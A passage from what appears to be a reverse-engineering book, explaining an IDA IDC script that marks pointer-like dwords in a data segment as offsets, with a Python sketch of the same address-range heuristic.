On line 8, we get the current address of the cursor on the screen by calling ScreenEA. We then find the beginning and end of the segment this address is in by calling SegStart and SegEnd, respectively. The idea here is that we want to loop through this segment (which is presumably a data segment) and find Dwords that look like they might be pointers. On line 13, we call hasValue to make sure that there is a value[32] at this address, and we check to make sure that there is not a machine instruction at this address by calling GetMnem. If the item at a given address is an assembly instruction, GetMnem returns its mnemonic as a string; otherwise, it returns an empty string. If this check fails because there is an assembly instruction at the address, we skip past the instruction by setting the offset to the address at the end of the current instruction, which we get by calling ItemEnd on line 21. If this check fails because there is no value located at this address, then we assume we have hit the end of usable data in this segment and we exit early. If the address has a value and is not an instruction, then we do a quick check to see whether its value falls within a practical range for it to be a pointer. If it does, we call OpOffEx to set the type at this address to be an offset. On line 18, we call Wait to give IDA a chance to catch up with the changes we have made to the database and to perform auto-analysis based on the new type information we have given it. We could have left this call out, but without it IDA appears unresponsive while our script runs and nearly locks up doing auto-analysis when we finish.

You may notice that we have not supplied a main routine with this script. I've left it out here because I don't want fixDataOffsets to run automatically when we load this. To start this function running, you will need to select File → "IDC command..." from the top menu, enter fixDataOffsets( );, and press OK.
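The pointer heuristic itself does not depend on IDA, so it can be tried on any raw dump of a data segment. The Python sketch below is a simplified version of the idea: it only looks at 4-byte-aligned dwords and has no notion of IDA items or flags. The function name, the base address, and the sample data are assumptions; the 0x400000 to 0x500000 range is the one used in the script above.

```python
import struct


def find_probable_pointers(data, base, low=0x400000, high=0x500000):
    """Return addresses of aligned dwords whose value falls in [low, high]."""
    hits = []
    for offset in range(0, len(data) - 3, 4):
        (value,) = struct.unpack_from("<I", data, offset)
        if low <= value <= high:
            hits.append(base + offset)
    return hits


# Toy data segment: two plausible code addresses mixed with other values.
toy_segment = struct.pack("<4I", 0x00408200, 0x12345678, 0x004A93F0, 0)
pointer_hits = find_probable_pointers(toy_segment, base=0x4D0000)
```

As with the IDC version, the range check is only a heuristic. An ordinary integer that happens to fall inside the range will be flagged too, so the bounds should match the actual layout of the image you are analyzing.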



[32] An example of when there is no value at an address is an address in the stack segment when a program is not being debugged.